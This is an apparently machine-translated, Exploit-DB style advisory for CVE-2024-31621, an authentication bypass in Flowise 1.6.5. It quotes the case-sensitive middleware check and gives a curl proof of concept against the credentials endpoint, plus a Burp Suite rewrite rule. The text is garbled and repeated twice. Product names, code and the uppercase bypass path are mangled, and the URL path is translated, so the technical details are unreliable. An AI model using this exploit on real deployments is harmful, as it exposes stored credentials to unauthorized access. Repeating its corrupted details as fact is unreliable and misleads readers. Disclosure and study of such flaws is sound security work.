#利用标题:流量1.6.5-身份验证旁路
#date: 17-April-2024
#利用作者: Maerifat Majeed
#供应商HomePage3360 https://flowiseai.com/
#软件link: https://github.com/flowiseai/flowise/releases
#版本: 1.6.5
#在: Mac-OS上测试
#CVE : CVE-2024-31621
Flowe版本=1.6.5很容易受到身份验证绕过的攻击
脆弱性。
代码段
this.app.use((req,res,next)={
if(req.url.includes('/api/v1/')){
whitelisturls.some(((url)=req.url.includes(url))?
next(): BasicAuthmiddleware(req,res,sext)
} else next()
}))
使用路径/API /V1为所有端点放置身份验证中间件
除了一些白色终点点。但是代码确实检查了情况
因此,灵敏度仅检查小写/API /V1。任何修改的人
大写(例如/api /v1)的端点可以绕过身份验证。
POC:
curl http://localhost:3000/api/v1/凭据
用于无缝身份验证旁路。使用Burpsuite功能匹配并更换
代理设置中的规则。添加规则请求第一行API/V1==API/V1
#date: 17-April-2024
#利用作者: Maerifat Majeed
#供应商HomePage3360 https://flowiseai.com/
#软件link: https://github.com/flowiseai/flowise/releases
#版本: 1.6.5
#在: Mac-OS上测试
#CVE : CVE-2024-31621
Flowe版本=1.6.5很容易受到身份验证绕过的攻击
脆弱性。
代码段
this.app.use((req,res,next)={
if(req.url.includes('/api/v1/')){
whitelisturls.some(((url)=req.url.includes(url))?
next(): BasicAuthmiddleware(req,res,sext)
} else next()
}))
使用路径/API /V1为所有端点放置身份验证中间件
除了一些白色终点点。但是代码确实检查了情况
因此,灵敏度仅检查小写/API /V1。任何修改的人
大写(例如/api /v1)的端点可以绕过身份验证。
POC:
curl http://localhost:3000/api/v1/凭据
用于无缝身份验证旁路。使用Burpsuite功能匹配并更换
代理设置中的规则。添加规则请求第一行API/V1==API/V1